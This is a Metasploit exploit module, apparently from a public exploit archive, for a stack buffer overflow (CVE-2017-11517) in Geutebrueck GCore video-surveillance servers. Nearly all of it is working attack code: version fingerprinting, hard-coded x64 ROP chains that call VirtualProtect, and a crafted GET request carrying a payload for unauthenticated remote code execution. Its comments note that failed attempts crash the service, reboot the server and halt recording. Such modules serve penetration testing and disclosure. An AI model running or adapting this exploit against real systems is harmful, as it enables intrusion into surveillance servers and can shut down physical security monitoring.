Geutebrueck GCore GCoreServer.exe Buffer Overflow

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'nokogiri'  
require 'open-uri'  
  
class MetasploitModule < Msf::Exploit::Remote  
include Msf::Exploit::Remote::Tcp  
  
Rank = NormalRanking  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE',  
'Description' => %q{  
This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).  
The vulnerable webserver is running on Port 13003 and Port 13004, does not require  
authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Luca Cappiello',  
'Maurice Popp'  
],  
'References' =>  
[  
['EDB','41153'],  
['CVE', '2017-11517'],  
['URL','www.geutebrueck.com']  
],  
'Platform' => 'win',  
'Targets' =>  
[  
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }],  
['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}],  
['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}]  
],  
'Payload' =>  
{  
'Space' => '2000'  
},  
'Privileged' => true,  
'DisclosureDate' => 'Jan 24 2017',  
'DefaultTarget' => 0))  
  
register_options(  
[Opt::RPORT(13003)]  
)  
end  
  
def fingerprint  
print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")  
@doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))  
statistics = @doc.css('modulestate')  
statistics.each do |x|  
if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')  
mytarget = targets[1]  
print_status("Vulnerable version detected: #{mytarget.name}")  
return Exploit::CheckCode::Appears, mytarget  
elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37')  
mytarget = targets[2]  
print_status("Vulnerable version detected: #{mytarget.name}")  
return Exploit::CheckCode::Appears, mytarget  
end  
end  
print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")  
print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.')  
print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')  
print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')  
[Exploit::CheckCode::Unknown, nil]  
end  
  
def check  
fingerprint  
end  
  
def ropchain(target)  
rop = ''  
# These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.  
stack_align = "\x43" * 16  
  
if target.name.include? '1.3.8.42'  
print_status('Preparing ROP chain for target 1.3.8.42!')  
  
# 0x140cd00a9 | add rsp, 0x10 ; ret  
# This is needed because the next 16 bytes are sometimes messed up.  
overwrite = [0x140cd00a9].pack('Q<')  
  
# We have 40 bytes left to align our stack!  
# The most reliable way to align our stack is to save the value of rsp in another register, do some calculations  
# and to restore it.  
# We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.  
  
# 0x1404e5cbf: mov edx, esp ; ret  
stack_align << [0x1404e5cbf].pack('Q<')  
  
# As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.  
# We pop -XXXXX as \xxxxxxxxx to rax  
# 0x14013db94 pop rax ; ret  
stack_align << [0x14013db94].pack('Q<')  
stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')  
  
# Our value is enough.  
# 0x1407dc547 | add rax,rdx ; ret  
stack_align << [0x1407dc547].pack('Q<')  
  
# RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.  
# 0x140ce9ac0 | mov rsp, rax ; ..... ; ret  
stack_align << [0x140ce9ac0].pack('Q<')  
  
# Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.  
# We want RCX to hold the value for VP Argument "Address of Shellcode"  
# 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ;  
rop << [0x140cc2234].pack('Q<')  
rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;  
# 0x1400ae2ae | POP RDX; RETN  
# 0x...1000 | Value for VP "Size of Memory"  
rop << [0x1400ae2ae].pack('Q<')  
rop << [0x0000000000000400].pack('Q<')  
  
# 0x14029dc6e: | POP R8; RET  
# 0x...40 | Value for VP "Execute Permissions"  
rop << [0x14029dc6e].pack('Q<')  
rop << [0x0000000000000040].pack('Q<')  
  
# 0x1400aa030 | POP R9; RET  
# 0x1409AE1A8 is the .data section of gcore  
rop << [0x1400aa030].pack('Q<')  
rop << [0x1409AE1A8].pack('Q<')  
  
# 0x140b5927a: xor rax, rax ; ret  
rop << [0x140b5927a].pack('Q<')  
  
# 0x1402ce220 pop rax ; ret  
# 0x140d752b8 | VP Stub IAT Entry  
rop << [0x1402ce220].pack('Q<')  
rop << [0x140d752b8].pack('Q<')  
  
# 0x1407c6b3b mov rax, qword [rax] ; ret ;  
rop << [0x1407c6b3b].pack('Q<')  
  
# 0x140989c41 push rax; ret  
rop << [0x140989c41].pack('Q<')  
  
# 0x1406d684d jmp rsp  
rop << [0x1406d684d].pack('Q<')  
  
[rop, overwrite, stack_align]  
  
elsif target.name.include? '1.4.2.37'  
print_status('Preparing ROP chain for target 1.4.2.37!')  
  
# 0x140cd9759 | add rsp, 0x10 ; ret  
# This is needed because the next 16 bytes are sometimes messed up.  
overwrite = [0x140cd9759].pack('Q<')  
  
# We have 40 bytes left to align our stack!  
# The most reliable way to align our stack is to save the value of rsp in another register, do some calculations  
# and to restore it.  
# We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.  
  
# 0x1404f213f: mov edx, esp ; ret  
stack_align << [0x1404f213f].pack('Q<')  
  
# As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.  
# We pop -XXXXX as \xxxxxxxxx to rax  
# 0x14000efa8 pop rax ; ret  
stack_align << [0x14000efa8].pack('Q<')  
stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')  
  
# Our value is enough.  
# 0x140cdfe65 | add rax,rdx ; ret  
stack_align << [0x140cdfe65].pack('Q<')  
  
# RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.  
# 0x140cf3110 | mov rsp, rax ; ..... ; ret  
stack_align << [0x140cf3110].pack('Q<')  
  
# Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.  
# We want RCX to hold the value for VP Argument "Address of Shellcode"  
# 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ;  
rop << [0x140ccb984].pack('Q<')  
rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;  
# 0x14008f7ec | POP RDX; RETN  
# 0x...1000 | Value for VP "Size of Memory"  
rop << [0x14008f7ec].pack('Q<')  
rop << [0x0000000000000400].pack('Q<')  
  
# 0x140a88f81: | POP R8; RET  
# 0x...40 | Value for VP "Execute Permissions"  
rop << [0x140a88f81].pack('Q<')  
rop << [0x0000000000000040].pack('Q<')  
  
# 0x1400aa030 | POP R9; RET  
# 0x... | Value for VP "Writeable location". Not sure if needed?  
# 0x140FB5000 is the .data section of gcore; let's test with this writable section...  
rop << [0x1400aa030].pack('Q<')  
rop << [0x140FB5000].pack('Q<')  
  
# 0x140ccea2f: xor rax, rax ; et  
rop << [0x140ccea2f].pack('Q<')  
  
# 0x14000efa8 pop rax ; ret  
# 0x140d83268 | VP Stub IAT Entry  
rop << [0x14000efa8].pack('Q<')  
rop << [0x140d83268].pack('Q<')  
  
# 0x14095b254 mov rax, qword [rax] ; ret ;  
rop << [0x14095b254].pack('Q<')  
  
# 0x140166c46 push rax; ret  
rop << [0x140166c46].pack('Q<')  
  
# 0x140cfb98d jmp rsp  
rop << [0x140cfb98d].pack('Q<')  
  
[rop, overwrite, stack_align]  
  
else  
print_status('ROP chain for this version not (yet) available or the target is not vulnerable.')  
end  
end  
  
def exploit  
if target['auto']  
checkcode, target = fingerprint  
fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'  
target_rop, target_overwrite, target_stack_align = ropchain(target)  
else  
print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')  
print_status("Selected version: #{self.target.name}")  
target_rop, target_overwrite, target_stack_align = ropchain(self.target)  
end  
  
begin  
connect  
print_status('Crafting Exploit...')  
exploit = 'GET /'  
exploit << "\x41" * 200  
exploit << target_rop  
exploit << payload.encoded  
exploit << "\x41" * 1823  
exploit << target_overwrite  
exploit << target_stack_align  
  
print_status('Exploit ready for sending...')  
sock.put(exploit, 'Timeout' => 20)  
print_status('Exploit sent!')  
buf = sock.get_once || ''  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}")  
ensure  
print_status('Closing socket.')  
disconnect  
end  
end  
end  
`